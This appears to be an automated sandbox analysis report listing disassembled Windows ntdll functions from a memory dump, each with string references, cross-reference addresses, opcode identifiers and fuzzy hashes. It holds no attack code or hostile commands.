                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                • API String ID: 0-2515994595
                                                • Opcode ID: 6e5f8f03f5957edf70b373030a5b55bddc7efbf5a7d230236879ddfaaf0042e4
                                                • Instruction ID: 5b11e349eb1539affaa253d6224e38101eef20c4b79da48520774aef80490471
                                                • Opcode Fuzzy Hash: 6e5f8f03f5957edf70b373030a5b55bddc7efbf5a7d230236879ddfaaf0042e4
                                                • Instruction Fuzzy Hash: 1851CEB15093099BC729DF58C848BABBBE8EF95344F14492DE999C3241EB70D604CB96
                                                Function 01850274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 0-1700792311
                                                • Opcode ID: 16eef42e35897a9cfe0ed727799daf385c67720d2541158dda97b48029461310
                                                • Instruction ID: 1409db73d74ced25fe829667a40be196cfba52db31bbbf0763e4cd3842ae7b6d
                                                • Opcode Fuzzy Hash: 16eef42e35897a9cfe0ed727799daf385c67720d2541158dda97b48029461310
                                                • Instruction Fuzzy Hash: DDD1CA7150068AEFDB62DF68D494AAEFBF1FF49718F088049F8459B312C7349A85CB10
                                                Function 018289B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                Download Yara Rule
                                                Strings
                                                • HandleTraces, xrefs: 01828C8F
                                                • VerifierDebug, xrefs: 01828CA5
                                                • VerifierDlls, xrefs: 01828CBD
                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01828A67
                                                • AVRF: -*- final list of providers -*- , xrefs: 01828B8F
                                                • VerifierFlags, xrefs: 01828C50
                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01828A3D
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                • API String ID: 0-3223716464
                                                • Opcode ID: 99bb4f5550c38df4a61e3fd0b5d19d58f186f3669031ae4e98e6bd3a2133d584
                                                • Instruction ID: 29775bbd1fe31c951cd8018c090955bd3ee2bcce6d09112f024b4ac44e676da0
                                                • Opcode Fuzzy Hash: 99bb4f5550c38df4a61e3fd0b5d19d58f186f3669031ae4e98e6bd3a2133d584
                                                • Instruction Fuzzy Hash: FF914871A453269FEB23DF68C880B1AB7E4AB56B14F09045DFA41EB241C7709B84CB91
                                                Function 017D63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-792281065
                                                • Opcode ID: 79361569d3b3ec22c7c746b0cc041bcdf7b86f73da55cc01b31e9fa18623a4c0
                                                • Instruction ID: 364d9d1f0641d17039d6551c71febc1b4acacf259418f9ecdf1ff633e49260e3
                                                • Opcode Fuzzy Hash: 79361569d3b3ec22c7c746b0cc041bcdf7b86f73da55cc01b31e9fa18623a4c0
                                                • Instruction Fuzzy Hash: 8A915C71B403159BEB35DF58D848BAEBBB5BB40B24F180129FA01A7289D7744B41CBD1
                                                Function 0179645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 017F9A11, 017F9A3A
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017F99ED
                                                • apphelp.dll, xrefs: 01796496
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017F9A2A
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017F9A01
                                                • LdrpInitShimEngine, xrefs: 017F99F4, 017F9A07, 017F9A30
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-204845295
                                                • Opcode ID: 3b79ead7dbbd7628b0e723ebab0858c40a364db81d9881053e91e2f4b7eb8400
                                                • Instruction ID: 2b4994b7621936471a9f91e32675e67dc876b61253dac830753d33a829657812
                                                • Opcode Fuzzy Hash: 3b79ead7dbbd7628b0e723ebab0858c40a364db81d9881053e91e2f4b7eb8400
                                                • Instruction Fuzzy Hash: 5251B2712483019FEB25DF24D895B9BF7E4FF84748F14091DFA8597265E630EA08CB92
                                                Function 017D2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlGetAssemblyStorageRoot, xrefs: 01812160, 0181219A, 018121BA
                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01812180
                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0181219F
                                                • SXS: %s() passed the empty activation context, xrefs: 01812165
                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01812178
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018121BF
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                • API String ID: 0-861424205
                                                • Opcode ID: d632fb744078241de71e70ab12834ba7790d1c2dcc2582e67cfb70fbd03b1913
                                                • Instruction ID: 2667dae5321faeaf1b90dbdbbd6d15954921ab9c0823a39e3cbbd7adae10a5df
                                                • Opcode Fuzzy Hash: d632fb744078241de71e70ab12834ba7790d1c2dcc2582e67cfb70fbd03b1913
                                                • Instruction Fuzzy Hash: ED313576F802297BEB21DA998C81F5AFB7DDF65B50F250059FB05EB105D270AB01C3A1
                                                Function 017DC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 018181E5
                                                • Loading import redirection DLL: '%wZ', xrefs: 01818170
                                                • minkernel\ntdll\ldrinit.c, xrefs: 017DC6C3
                                                • LdrpInitializeImportRedirection, xrefs: 01818177, 018181EB
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01818181, 018181F5
                                                • LdrpInitializeProcess, xrefs: 017DC6C4
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-475462383
                                                • Opcode ID: ecb4b292502aab3ba2aa566e6aa1a68f56361d9e66411762c1026eeda06c4742
                                                • Instruction ID: f6997fc0e2f137ebe38b47aef82d6781814bd5dff79401570e42a0f2db679e18
                                                • Opcode Fuzzy Hash: ecb4b292502aab3ba2aa566e6aa1a68f56361d9e66411762c1026eeda06c4742
                                                • Instruction Fuzzy Hash: 5F3117B26443469FC215EF2CDC4AE1AF7E4EF94B10F04055CF9459B299E620EE04C7A2
                                                Function 017E096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 017E2DF0: LdrInitializeThunk.NTDLL ref: 017E2DFA
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BA3
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BB6
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D60
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D74
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                • String ID:
                                                • API String ID: 1404860816-0
                                                • Opcode ID: f9463549ef92185ede80c7e1df5c0b32f7e8da2fde19c92428392fcfb1208496
                                                • Instruction ID: 77b3c1892c847f0c2f12c6844d2774c1c80d72de7009a155def703c35c1fd953
                                                • Opcode Fuzzy Hash: f9463549ef92185ede80c7e1df5c0b32f7e8da2fde19c92428392fcfb1208496
                                                • Instruction Fuzzy Hash: FE426D72A00715DFDB21CF28C894BAAB7F9FF08314F1445A9E989DB245D770AA84CF60
                                                Function 017AA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                • Opcode ID: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                • Instruction ID: 54aaf231e38e0a351435c35b25a278ac7f5225bba743e9fb5c22e4c504b0a20f
                                                • Opcode Fuzzy Hash: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                • Instruction Fuzzy Hash: 5EC18970108386CFD722CF58C444B6ABBE4BF84704F448A6AF995CB291E774CA49CB56
                                                Function 017D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 017D8421
                                                • @, xrefs: 017D8591
                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017D855E
                                                • LdrpInitializeProcess, xrefs: 017D8422
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1918872054
                                                • Opcode ID: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                • Instruction ID: 6ec6246460fb5a6fada40ab8b3c37fde6894f4bf332429c5d9b9a835b9bc28bb
                                                • Opcode Fuzzy Hash: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                • Instruction Fuzzy Hash: 59917D71508349AFDB22DF65CC44FABFAECBB88744F84092EF685D6155E370DA048B62
                                                Function 017D273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018122B6
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018121D9, 018122B1
                                                • SXS: %s() passed the empty activation context, xrefs: 018121DE
                                                • .Local, xrefs: 017D28D8
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                • Opcode ID: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                • Instruction ID: 4f97195c9fc8651cebf8d861fe21d884024ee1c5286d67f284f5674370681cf4
                                                • Opcode Fuzzy Hash: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                • Instruction Fuzzy Hash: E6A1C03194122DDFDB25CF68C888BA9F7B5BF58314F2401E9D908AB256D7309E81CF90
                                                Function 017D4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlDeactivateActivationContext, xrefs: 01813425, 01813432, 01813451
                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01813456
                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01813437
                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0181342A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                • API String ID: 0-1245972979
                                                • Opcode ID: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                • Instruction ID: f827aaa253511f07f5cc9b38aaee6bba9dc7ff6af19dcea924307b7d8ac94e08
                                                • Opcode Fuzzy Hash: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                • Instruction Fuzzy Hash: 176124726807169BD722CF1CC881B2AF7F5BFA4B20F148519E95ADB644D730E941CB91
                                                Function 017A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                Download Yara Rule
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01800FE5
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018010AE
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0180106B
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01801028
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                • Opcode ID: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                • Instruction ID: 7c2dfa66eff94d1b5470e780fa78d6fbd5856dd6ffbe67510d604925c53b3877
                                                • Opcode Fuzzy Hash: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                • Instruction Fuzzy Hash: C271C3B19043059FCB21DF14C888B97BFE8EF95764F540569F9888B28AD734D688CBD2
                                                Function 017C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                Download Yara Rule
                                                Strings
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0180A992
                                                • LdrpDynamicShimModule, xrefs: 0180A998
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0180A9A2
                                                • apphelp.dll, xrefs: 017C2462
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-176724104
                                                • Opcode ID: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                • Instruction ID: 65cee056b2066928d82769b987613b0d3d33d695c8ffef7258e9a05a6f5d972e
                                                • Opcode Fuzzy Hash: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                • Instruction Fuzzy Hash: 0B312772700305ABDB369F6D9D85A7AB7B5FB80B04F29005DE910EB299D7705B82CB80
                                                Function 017B29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 017B3255
                                                • HEAP: , xrefs: 017B3264
                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017B327D
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                • API String ID: 0-617086771
                                                • Opcode ID: 16dc682f4d2ee67e52a6bb5a24a578ca7dd555d83f7b3c3cbc0e359aba17dc6d
                                                • Instruction ID: 114ac5d1014d6d2fd51be5f960bc4d271419f2ce705a0e88e9c81ced2bce6c37
                                                • Opcode Fuzzy Hash: 16dc682f4d2ee67e52a6bb5a24a578ca7dd555d83f7b3c3cbc0e359aba17dc6d
                                                • Instruction Fuzzy Hash: F1929971A056499FEB25CF68C484BEEFBF1FF48304F188099E859AB352D734A985CB50
                                                Function 017B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                • Instruction ID: 3f3996ded880afc01c262e04e5cee863ba4d9cb064f5ea5ec26da780ab3128a9
                                                • Opcode Fuzzy Hash: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                • Instruction Fuzzy Hash: 04F17B7060060ADFEB26CF68C894BAAF7B5FF44304F1441A9E516DB391D734AA81CFA1
                                                Function 017C6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $@
                                                • API String ID: 0-1077428164
                                                • Opcode ID: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                • Instruction ID: db0707ec75cb0474648c57400a13013647d83ae859605bd890c0634074a79e99
                                                • Opcode Fuzzy Hash: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                • Instruction Fuzzy Hash: E6C290716083459FE769CF28C881BABFBE5AF88B14F04896DF989C7241DB34D944CB52
                                                Function 0179A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                • Opcode ID: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                • Instruction ID: 7d9f31a89f7b89aeaaaf4388369b03823759dc53d1df58ea0e69746753f3fa86
                                                • Opcode Fuzzy Hash: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                • Instruction Fuzzy Hash: 57A14A759116299BDF329B68CC88BAAF7B8EF48710F1001E9EA09A7251D7359E84CF50
                                                Function 017C0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0180A121
                                                • LdrpCheckModule, xrefs: 0180A117
                                                • Failed to allocated memory for shimmed module list, xrefs: 0180A10F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-161242083
                                                • Opcode ID: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                • Instruction ID: c0f141cecd5a7ec74cc0d1f0bc4d602f08999daa9e16230af325f2f954067b4d
                                                • Opcode Fuzzy Hash: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                • Instruction Fuzzy Hash: 38719E75A00209DFDB2ADF68C985ABEF7F4FB44704F18406DE912EB255E734AA41CB90
                                                Function 017B0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-1334570610
                                                • Opcode ID: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                • Instruction ID: e2e80ba0867003d9a3af703f4812f989f7b952425e9f15f0da59700d005ab3d6
                                                • Opcode Fuzzy Hash: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                • Instruction Fuzzy Hash: F361AB716003059FDB29CF28C884BABFBB1FF45704F15859AE449CB292D770E981CB91
                                                Function 017DC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 018182E8
                                                • Failed to reallocate the system dirs string !, xrefs: 018182D7
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 018182DE
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1783798831
                                                • Opcode ID: 05a14882493560adde4f671eb49abee18977e27c928243928f52b98de96ceeb6
                                                • Instruction ID: b87413ee3b8bd93655c1830a29b9edae4c492469d0ea60f01504acc292a04135
                                                • Opcode Fuzzy Hash: 05a14882493560adde4f671eb49abee18977e27c928243928f52b98de96ceeb6
                                                • Instruction Fuzzy Hash: C94125B2541305ABC722EB68DC89B5BB7F8AF48720F19092EF955C3258E770D900CBD1
                                                Function 0185C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                Download Yara Rule
                                                Strings
                                                • @, xrefs: 0185C1F1
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0185C1C5
                                                • PreferredUILanguages, xrefs: 0185C212
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                • API String ID: 0-2968386058
                                                • Opcode ID: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                • Instruction ID: fdef3bdb83965e3a5db392fe3fdfcf626b9385d07723b3fe6b77b9f90721a755
                                                • Opcode Fuzzy Hash: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                • Instruction Fuzzy Hash: 3D414F75A00209ABDF51DAD8C895BEEFBBCEB14744F14406AEA09F7284D7749A448F90
                                                Function 01834144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                • API String ID: 0-1373925480
                                                • Opcode ID: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
                                                • Instruction ID: 6b6053061c039eec3f4e128d070b8199b29d6c8a53a199562ea4480c5d809fb3
                                                • Opcode Fuzzy Hash: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
